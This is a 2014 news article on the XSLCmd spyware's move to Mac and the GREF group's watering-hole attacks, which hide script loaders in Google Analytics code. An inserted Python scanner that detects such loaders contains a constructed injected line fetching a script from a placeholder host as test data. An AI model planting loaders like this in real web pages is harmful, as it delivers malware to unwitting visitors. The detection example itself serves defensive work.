

By | John Leyden 5th September 2014 23:43

New software ported from Windows to Mac! You'll never guess what. Yes, it's spyware

XSLCmd coming your way, whether you like it or not

Miscreants have ported five-year-old spyware XSLCmd to OS X.

The Windows version of the malware has been around since 2009, and the Apple Mac edition of XSLCmd shares significant portions of the same code. It can open a reverse shell to its masters, automatically transfer your documents to a remote system, install executables, and is configurable.

But the OS X port adds new features, according to net security firm FireEye, which claims to have discovered the backdoor-installing tool.

"The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing," FireEye said.

The infosec biz tracked the development of the software to a group it has named GREF due to the gang's habit of dropping references to Google in their nefarious activities.

GREF's targets range from US defense contractors to electronics and engineering companies worldwide, as well as foundations and non-government organizations – especially those with interests in Asia.

The gang's favorite tactic involves setting up watering holes: essentially, hacking websites popular with workers in the aforementioned industries to inject a malicious JavaScript file into the sites' webpages.

The mechanism to pull in the code is tucked away inside blocks of Google Analytics code. Once executed, the JavaScript gets to work pulling in and installing XSLCmd.

FireEye explained that "true to their moniker the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did."
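The placement trick described above (a loader reference hidden inside an otherwise legitimate Google Analytics block) is something a site owner can check for in page source. The following scanner is an added example, not code from the article or from FireEye; it collects every `<script>` block, keeps those that look like Google Analytics boilerplate, and flags any URL in them whose host is not a Google Analytics host. The sample page, the injected loader line and the host `stats.example.invalid` are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Strings that identify a Google Analytics snippet (analytics.js or the older ga.js).
GA_MARKERS = ("GoogleAnalyticsObject", "_gaq", "google-analytics.com")
# Hosts a genuine GA block is expected to reference; anything else is suspicious.
ALLOWED_HOSTS = {"www.google-analytics.com", "ssl.google-analytics.com"}
# Absolute or protocol-relative URL; group 1 is the host part.
URL_RE = re.compile(r"""(?:https?:)?//([^/'"\s)]+)[^'"\s)]*""", re.I)


class ScriptCollector(HTMLParser):
    """Gathers (src attribute, inline body) for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts, self._in_script, self._src, self._buf = [], False, None, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._src, self._buf = True, dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def find_foreign_urls_in_ga_blocks(html):
    """Return URLs found inside GA-looking script blocks that point off google-analytics.com.
    Note: the old ga.js snippet builds its URL from concatenated string pieces, which this
    simple regex does not join; review any hit on that snippet by hand."""
    parser = ScriptCollector()
    parser.feed(html)
    hits = []
    for _src, body in parser.scripts:
        if not any(marker in body for marker in GA_MARKERS):
            continue  # not a GA block, out of scope for this check
        for m in URL_RE.finditer(body):
            if m.group(1).lower() not in ALLOWED_HOSTS:
                hits.append(m.group(0))
    return hits


# Constructed sample: a standard analytics.js block (placeholder property id).
GA_SNIPPET = """<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-000000-0', 'auto');
ga('send', 'pageview');
</script>"""
# Constructed indicator: an extra loader tucked into the same block, as the article describes.
INJECTED_LINE = "var x=document.createElement('script');x.src='http://stats.example.invalid/stats.js';"
CLEAN_HTML = "<html><body>" + GA_SNIPPET + "</body></html>"
TAMPERED_HTML = "<html><body>" + GA_SNIPPET.replace("</script>", INJECTED_LINE + "\n</script>") + "</body></html>"
```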

GREF have often used web server vulnerabilities to lay the groundwork for attacks.

"They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system," FireEye researchers James T. Bennett and Mike Scott wrote in their blog post.

Surveillance and remote-control tools targeted at Mac users are uncommon. However, security tools vendor AlienVault documented an Office for Mac attack targeting Tibetan non-government organizations two years ago.

And the so-called Icefog group hit military and media outlets in South Korea and Japan last year after developing backdoor-installing malware that worked on Mac and Windows machines, as discovered by Russian security firm Kaspersky Lab. ®
